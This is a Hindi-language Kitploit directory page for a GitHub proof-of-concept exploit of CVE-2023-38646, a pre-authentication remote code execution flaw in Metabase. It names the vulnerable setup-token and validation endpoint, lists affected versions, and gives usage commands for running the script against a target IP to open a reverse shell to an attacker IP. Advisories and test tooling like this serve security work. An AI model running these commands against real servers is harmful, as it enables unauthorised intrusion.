Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ego1stoo/cve-2023-38646
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubego1stoo/cve-2023-38646

CVE-2023-38646

रिपॉजिटरी देखें
132 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Metabase open source 0.46.6.1 से पहले और Metabase Enterprise 1.46.6.1 से पहले, हमलावरों को सर्वर के विशेषाधिकार स्तर पर सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देते हैं। शोषण के लिए प्रमाणीकरण आवश्यक नहीं है। अन्य सुधारित संस्करण 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 और 1.43.7.2 हैं।

साझा करें

CVE-2023-38646 Metabase Pre-Auth RCE (11/26/2023)

Metabase open source 0.46.6.1 से पहले और Metabase Enterprise 1.46.6.1 से पहले के संस्करण हमलावरों को सर्वर पर, सर्वर के विशेषाधिकार स्तर पर मनमाने कमांड निष्पादित करने की अनुमति देते हैं। शोषण के लिए प्रमाणीकरण आवश्यक नहीं है। अन्य निश्चित संस्करण 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, और 1.43.7.2 हैं।

यह भेद्यता एप्लिकेशन के setup-token को उजागर करने में मौजूद है, जिसका उपयोग api/setup/validate के भीतर डेटाबेस को मान्य करने के लिए किया जा सकता है। अनधिकृत उपयोगकर्ता दुर्भावनापूर्ण कोड बना सकता है और मनमाने कमांड निष्पादित कर सकता है।

अस्वीकरण

अपने जोखिम पर उपयोग करें

यह स्क्रिप्ट केवल शैक्षिक और परीक्षण उद्देश्यों के लिए प्रदान की गई है। लेखक इसके उपयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। लागू कानूनों और नैतिक मानकों का अनुपालन सुनिश्चित करें। इस स्क्रिप्ट का उपयोग करके, आप इन शर्तों को स्वीकार और मान्य करते हैं।

Metabase

Metabase एक ओपन सोर्स बिजनेस इंटेलिजेंस टूल है जो आपको विभिन्न डेटाबेस और डेटा स्रोतों से डेटा का उपयोग करके चार्ट और डैशबोर्ड बनाने की सुविधा देता है। यह एक लोकप्रिय प्रोजेक्ट है, जिसके GitHub पर 33k से अधिक स्टार्स हैं और पिछले कुछ वर्षों में भेद्यता अनुसंधान के दृष्टिकोण से इसकी काफी जांच की गई है।

प्रूफ ऑफ कॉन्सेप्ट

कमांड्स

root@kitploit:~
usage: CVE-2023-38646.py [-h] -rh REMOTE_HOST [-rp [REMOTE_PORT]] -p PORT -l LOCAL_HOST

options:
  -h, --help            show this help message and exit
  -rh REMOTE_HOST, --remote-host REMOTE_HOST
                        Hostname of the target.
  -rp [REMOTE_PORT], --remote-port [REMOTE_PORT]
                        Port of the Target Machine (default: Port 80)
  -p PORT, --port PORT  Port for reverse shell.
  -l LOCAL_HOST, --local-host LOCAL_HOST
                        Your IP Adress

आप नीचे दिए गए कमांड का उपयोग करके स्क्रिप्ट चला सकते हैं। आप -rp का उपयोग करके रिमोट पोर्ट बदल सकते हैं। डिफ़ॉल्ट पोर्ट 80 है।

root@kitploit:~
./CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
root@kitploit:~
python3 CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>

image

असुरक्षित संस्करण

root@kitploit:~
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2

संदर्भ

  • Packet storm security Metabase-Remote-Code-Execution
  • NVD CVE-2023-38646 विवरण
टूल डाउनलोड करें